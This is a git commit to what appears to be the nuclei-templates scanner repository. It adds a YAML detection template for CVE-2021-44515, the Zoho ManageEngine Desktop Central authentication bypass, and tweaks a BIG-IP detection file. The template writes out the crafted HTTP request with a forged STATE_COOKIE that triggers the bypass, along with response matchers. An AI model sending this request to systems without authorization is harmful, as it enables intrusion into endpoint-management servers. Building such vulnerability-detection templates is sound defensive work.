Zoho Desktop Central Authentication Bypass Vulnerability (CVE-2021-44515) (#4142)

* Added Template for CVE-2021-44515 * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-04-24 05:12:25 -05:00 · 2022-04-24 05:12:25 -05:00 · fd3a7c8fc5
parent cedf4dee89
commit fd3a7c8fc5
2 changed files with 37 additions and 1 deletions
--- a/cves/2021/CVE-2021-44515.yaml
+++ b/cves/2021/CVE-2021-44515.yaml
@ -0,0 +1,36 @@
+id: CVE-2021-44515
+
+info:
+  name: Zoho ManageEngine Desktop Central - Remote Code Execution
+  author: Adam Crosser
+  severity: critical
+  description: Zoho Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
+  reference:
+    - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
+    - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
+    - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
+  classification:
+    cve-id: CVE-2021-44515
+  tags: cve,cve2021,cisa,zoho,rce,manageengine
+
+requests:
+  - raw:
+      - |
+        GET /STATE_ID/123/agentLogUploader HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: STATE_COOKIE=&_REQS/_TIME/123
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: dsl
+        dsl:
+          - "len(body) == 0"
+
+      - type: word
+        part: header
+        words:
+          - "UEMJSESSIONID="
--- a/technologies/bigip-config-utility-detect.yaml
+++ b/technologies/bigip-config-utility-detect.yaml
@ -31,4 +31,4 @@ requests:
      - type: word
        words:
          - "check your user-id and password and try again"
-        part: body
+        part: body